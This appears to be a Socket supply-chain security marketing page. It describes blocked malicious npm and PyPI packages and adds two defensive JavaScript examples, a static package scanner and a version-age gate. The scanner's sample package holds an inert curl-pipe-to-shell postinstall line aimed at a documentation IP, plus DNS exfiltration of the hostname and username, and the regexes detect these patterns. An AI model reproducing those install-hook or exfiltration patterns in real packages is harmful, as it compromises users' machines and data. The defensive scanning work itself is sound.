Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.


Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery: timmywil published 3.7.1
left-pad: stevemao published 1.3.0
react: react-bot published 19.1.0

We protect you from vulnerable and malicious packages

azure-graphrbac

4.6.7

Removed from npm

Blocked by Socket

Possible typosquat of azure - Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles legitimate Azure package naming conventions, which could confuse users. The maintainers list includes 'npm', which is not a specific known maintainer. Therefore, it is likely a typosquat.

Live on npm for 49 minutes before removal. Socket users were protected even while the package was live.

epm-rdpt-angularjs

1.0.6

by nishant57

Removed from npm

Blocked by Socket

The provided source code is highly malicious as it sets up a reverse shell, allowing unauthorized remote access and control over the system. This poses a severe security risk.

Live on npm for 1 hour and 7 minutes before removal. Socket users were protected even while the package was live.

llm-oracle

1.0.1

by josh.weavery

Live on npm

Blocked by Socket

The code is heavily obfuscated and performs suspicious activities such as copying a file to a system directory and executing it with elevated privileges. This behavior, combined with the obfuscation, suggests a high likelihood of malicious intent.

jcnpm-cli

1.0.0

by jeftlee

Removed from npm

Blocked by Socket

The 'commandSpawn' function is vulnerable to command injection and other shell-based exploits due to the lack of input validation and output sanitization. The package should be used with caution and additional security measures should be taken to mitigate the risk of shell-based exploits.

Live on npm for 9 hours and 35 minutes before removal. Socket users were protected even while the package was live.

qg-toolkit

1.0.13

Live on PyPI

Blocked by Socket

The script collects sensitive user information from the Discord API, including usernames, emails, and IDs, and saves it to a file without user consent. It automates interactions with Discord, including sending unsolicited messages to channels (spamming), and uses a captcha solving service to bypass security measures. The script contains hardcoded API keys and tokens, posing significant security risks if shared or leaked. Additionally, it includes obfuscated JavaScript code to manipulate local storage tokens, suggesting attempts to hijack or misuse user accounts.

@stripo/backend

276.0.20

by neversummer.69

Live on npm

Blocked by Socket

The script collects a wide range of information from the user's system, including OS details, network interfaces, and SSH files, and sends it to a remote server via DNS queries.

single-spa-workfront

1.0.9

by jr0ch17-workfront

Removed from npm

Blocked by Socket

The code is collecting and transmitting sensitive system and user data to an external server without user consent, which is indicative of malicious behavior. The use of HTTPS on port 80 is also suspicious. Immediate action is recommended to prevent potential data breaches.

Live on npm for 13 days, 13 hours and 17 minutes before removal. Socket users were protected even while the package was live.

ntm001-module

3.0.1

by ntm001

Removed from npm

Blocked by Socket

This install script poses a significant security risk as it downloads and executes a script from an untrusted source without any validation. This behavior is highly suspicious and likely malicious.

Live on npm for 22 minutes before removal. Socket users were protected even while the package was live.

curri-slack

0.0.7

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, sending sensitive system and project information to external servers. This indicates a high risk of malicious activity.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

vizi-dashboard

17.7.7

by itsme369

Removed from npm

Blocked by Socket

This module does not execute any code or perform any actual operations, but it contains a message that indicates the possibility of a code injection vulnerability. This could be a sign of a malicious actor attempting to exploit a vulnerability in the system.

Live on npm for 12 hours and 19 minutes before removal. Socket users were protected even while the package was live.

@epic-social/store

2.2.0

by svennergr2

Live on npm

Blocked by Socket

This code is highly suspicious and likely malicious. It collects sensitive system information and attempts to send it to an external server via DNS queries using the ping command. The hardcoded ID and use of Base64 encoding further indicate an attempt to obfuscate the data being sent. Immediate review and remediation are recommended.

videoads-util-capability-detection

1.0.8

by videoads-util-url-loader

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating sensitive system information to a remote server, posing a significant security risk.

Live on npm for 1 day, 2 hours and 25 minutes before removal. Socket users were protected even while the package was live.

kasms

1.0.128

by psych0124

Removed from npm

Blocked by Socket

The code takes a base64 encoded string, decodes it, and evaluates it using the 'eval' function. This introduces a significant security risk as it allows arbitrary code execution. The code should be considered dangerous and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

calc_ucadidayug

1.0.7

Removed from npm

Blocked by Socket

This script poses a high security risk as it downloads and executes a remote shell script. This behavior is commonly associated with malware and should be considered highly suspicious.

Live on npm for 43 minutes before removal. Socket users were protected even while the package was live.

com.unity.2d.common

9.0.6

by vishal_gouri

Removed from npm

Blocked by Socket

The code exhibits clear malicious behavior by exfiltrating system data to a suspicious domain. The hardcoded DNS server and the method of data transmission indicate a high risk of data theft and unauthorized access. The overall security posture of this code is extremely concerning.

Live on npm for 20 days, 17 hours and 1 minute before removal. Socket users were protected even while the package was live.

airbnb-dev

9.1.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 18 hours and 24 minutes before removal. Socket users were protected even while the package was live.

xenon-quiver-lyp495

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The provided code imports several external libraries with unusual names and calls a function `functame` from each one. Without access to the contents of these libraries, it's impossible to determine if this code has malicious intent. The unusual names and lack of clear functionality explanation raise a potential red flag, but there is insufficient information to conclude definitively. This fragment could be benign or it could be a wrapper for malicious activities hidden in the libraries.

Live on npm for 56 days, 15 hours and 55 minutes before removal. Socket users were protected even while the package was live.

hydradx-ui

1.2.1

by hydra_dx_shiv

Removed from npm

Blocked by Socket

The script is likely malicious. It gathers extensive system information, including sensitive data, and sends it to an external server without consent. The presence of a hardcoded domain that is unrelated to the user or a known service is a strong indicator of a data exfiltration attempt.

tddzs1tg06

1.8.0

by tddzs1tg206

Removed from npm

Blocked by Socket

The code is suspicious as it retrieves update information from an unverified external source and uses 'execSync' to run shell commands, which could lead to remote code execution if the external content is compromised. Furthermore, the code attempts to forcibly update and reinstall packages which is not typical for secure update practices.

Live on npm for 4 hours and 11 minutes before removal. Socket users were protected even while the package was live.

dawgie

1.4.2

Live on PyPI

Blocked by Socket

The code has several serious security concerns, including unsafe deserialization via pickle, execution of untrusted commands, and a lack of validation for network inputs. Given the potential for arbitrary code execution and system compromise, this code should not be used as is.

tiktok-coins-generator869

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 3 hours and 55 minutes before removal. Socket users were protected even while the package was live.

coinbase-utils

999.9.9

by amigomioteconsidero13

Removed from npm

Blocked by Socket

The code is designed to exfiltrate system information by sending it to an external domain via DNS queries. This is a clear indication of malicious behavior, as it involves unauthorized data transmission without user consent.

Live on npm for 4 hours and 30 minutes before removal. Socket users were protected even while the package was live.

sift-web-sdk

100.0.0

by torpa_test

Removed from npm

Blocked by Socket

The script downloads a file from a remote server and includes system information in the URL. This behavior is highly suspicious and potentially malicious.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

react-router-packages

3.5.0

by revengerali

Removed from npm

Blocked by Socket

This code fragment has a high security risk due to the potential privacy violation and the use of obfuscation. The code collects and sends potentially sensitive information to an unknown third-party server, which is a cause for concern. The use of a hidden property and the lack of an error handler also suggest that this code may be intentionally obfuscated. Caution should be exercised when using this code.

Live on npm for 4 days, 16 hours and 11 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

12.24.1000

Removed from npm

Blocked by Socket

The code exhibits suspicious behavior by sending local machine data and potentially sensitive project information (package.json content) to remote servers. This indicates potential data exfiltration.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

AI-detected potential malware

Obfuscated code

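Several of the signals listed above, and most of the behaviours described on the package cards, can be checked with plain static heuristics before a package is ever installed. The scanner below is an added example written for this page, not Socket's own code. It runs over a package constructed in memory and flags lifecycle install scripts (including the download-and-pipe-to-shell pattern several cards describe), git and HTTP dependencies, a shipped npm-shrinkwrap.json, base64 strings that reach eval, subprocess use, and system-information collection paired with a network call. The signal names, regular expressions and the sample package are all assumptions chosen for the demo.

```javascript
// Added example, not Socket's code: a minimal static scanner that flags a few
// of the supply-chain risk signals named on this page. The package under test
// is constructed in memory; signal names and heuristics are assumptions.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const DEP_FIELDS = ['dependencies', 'devDependencies', 'optionalDependencies'];

// A package is modelled as its parsed package.json plus a map of path -> file contents.
function scanPackage(pkg) {
  const alerts = [];
  const add = (signal, detail) => alerts.push({ signal, detail });
  const manifest = pkg.manifest || {};
  const files = pkg.files || {};

  // 1. Lifecycle scripts run arbitrary code on `npm install`; one that pipes a
  //    download straight into a shell is the pattern several cards above describe.
  for (const hook of INSTALL_HOOKS) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (!cmd) continue;
    add('install-script', `${hook}: ${cmd}`);
    if (/\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b/.test(cmd)) {
      add('remote-script-execution', `${hook} downloads and executes a remote script`);
    }
  }

  // 2. Dependencies resolved outside the registry are not immutable published
  //    versions and are not scanned as such.
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(manifest[field] || {})) {
      if (/^(git(\+\w+)?:|github:|ssh:)|\.git(#|$)/.test(spec)) add('git-dependency', `${name}: ${spec}`);
      else if (/^https?:\/\//.test(spec)) add('http-dependency', `${name}: ${spec}`);
    }
  }

  // 3. npm-shrinkwrap.json ships with the package and overrides the consumer's
  //    own resolution, so it can pin transitive dependencies the consumer never chose.
  if (Object.prototype.hasOwnProperty.call(files, 'npm-shrinkwrap.json')) {
    add('npm-shrinkwrap', 'package ships npm-shrinkwrap.json');
  }

  // 4. Source-level heuristics over JavaScript files.
  for (const [path, src] of Object.entries(files)) {
    if (!/\.[cm]?js$/.test(path)) continue;
    const decodesBase64 = /Buffer\.from\([^)]*['"]base64['"]\)|\batob\s*\(/.test(src);
    if (decodesBase64 && /\b(eval|Function)\s*\(/.test(src)) {
      add('obfuscated-code', `${path}: base64-decoded string reaches eval/Function`);
    }
    if (/child_process/.test(src) && /\b(exec|execSync|spawn|spawnSync|execFile)\s*\(/.test(src)) {
      add('shell-access', `${path}: spawns a subprocess`);
    }
    const collectsSystemInfo = /\bos\.(hostname|userInfo|networkInterfaces|homedir)\s*\(/.test(src)
      || /\.ssh\b/.test(src);
    const talksToNetwork = /\b(dns|https?|net)\.\w+\s*\(|\bfetch\s*\(|\bping\b/.test(src);
    if (collectsSystemInfo && talksToNetwork) {
      add('exfiltration-pattern', `${path}: collects system info and reaches the network`);
    }
  }
  return alerts;
}

// Distinct signal names, sorted, for a quick verdict.
function signalNames(alerts) {
  return [...new Set(alerts.map((a) => a.signal))].sort();
}

// Constructed sample package mirroring several behaviours listed on this page.
// The host 203.0.113.7 is documentation address space and the payload is inert.
const SAMPLE_PACKAGE = {
  manifest: {
    name: 'example-util',
    version: '1.0.0',
    scripts: { postinstall: 'curl -s http://203.0.113.7/s.sh | sh && node setup.js' },
    dependencies: {
      'some-lib': 'git+https://github.com/example/some-lib.git#main',
      'other-lib': 'https://203.0.113.7/other-lib-1.0.0.tgz',
      left: '^1.3.0',
    },
  },
  files: {
    'npm-shrinkwrap.json': '{}',
    'setup.js': [
      "const os = require('os');",
      "const dns = require('dns');",
      "const { execSync } = require('child_process');",
      "const who = execSync('whoami').toString().trim();",
      "const payload = Buffer.from(os.hostname() + ':' + who).toString('base64');",
      "dns.resolve(payload + '.example.invalid', () => {});",
      "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
    ].join('\n'),
  },
};

for (const a of scanPackage(SAMPLE_PACKAGE)) {
  console.log(`${a.signal.padEnd(24)} ${a.detail}`);
}
```

A pass like this catches only the obvious cases: the heavily obfuscated samples above would need the decoded payload inspected, and string-splitting or dynamic property access defeats every regex here, which is why behavioural analysis of the actual code, not pattern matching on the manifest alone, is what the section above is about.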

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.
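The removal times on the cards above (minutes to days) motivate a cheap complementary control: refuse to resolve a version until it has been on the registry for a minimum age, so that a malicious release has time to be reported and pulled before it reaches a build. The gate below is an added example for this page, not Socket's code. The package document is constructed by hand in the shape of the npm registry's dist-tags, versions and time fields; the seven-day threshold and the fixed "now" are assumptions for the demo.

```javascript
// Added example, not Socket's code: a minimum-age gate that refuses to resolve
// a version published less than `minAgeMs` ago. SAMPLE_PACKUMENT is constructed
// in the shape of the npm registry's package document (dist-tags, versions,
// time); the threshold and the fixed "now" are assumptions for the demo.

const DAY_MS = 24 * 60 * 60 * 1000;

// Returns the newest version at least `minAgeMs` old, plus the newer versions
// skipped on the way. Only versions still present in `versions` count: the
// registry keeps `time` entries for unpublished versions but drops them from `versions`.
function pickVersion(packument, { now = Date.now(), minAgeMs = 7 * DAY_MS } = {}) {
  const times = packument.time || {};
  const published = Object.keys(packument.versions || {}).filter((v) => times[v]);
  const publishedAt = (v) => Date.parse(times[v]);
  published.sort((a, b) => publishedAt(b) - publishedAt(a)); // newest first
  const latest = (packument['dist-tags'] || {}).latest || null;
  const skipped = [];
  for (const v of published) {
    if (now - publishedAt(v) >= minAgeMs) {
      return { version: v, skipped, isLatest: v === latest };
    }
    skipped.push(v);
  }
  return { version: null, skipped, isLatest: false };
}

// Constructed registry document: 2.0.0 was published about twelve hours before NOW.
const SAMPLE_PACKUMENT = {
  name: 'example-lib',
  'dist-tags': { latest: '2.0.0' },
  versions: { '1.4.0': {}, '1.5.0': {}, '2.0.0': {} },
  time: {
    created: '2024-01-10T09:00:00.000Z',
    modified: '2024-03-01T12:05:00.000Z',
    '1.4.0': '2024-01-10T09:00:00.000Z',
    '1.5.0': '2024-02-20T15:30:00.000Z',
    '2.0.0': '2024-03-01T12:05:00.000Z',
  },
};
const NOW = Date.parse('2024-03-02T00:00:00.000Z');

const choice = pickVersion(SAMPLE_PACKUMENT, { now: NOW });
console.log(`resolved ${choice.version}, skipped ${choice.skipped.join(', ') || 'none'}`);
```

A cooldown does nothing against a package that is malicious from its first release and stays live for weeks, as several cards above show, so it complements content scanning rather than replacing it.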


Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.


Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.


Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.

Ready to dive in?

Get protected by Socket with just 2 clicks.


The latest from the Socket team

Get our latest security research, open source insights, and product updates.
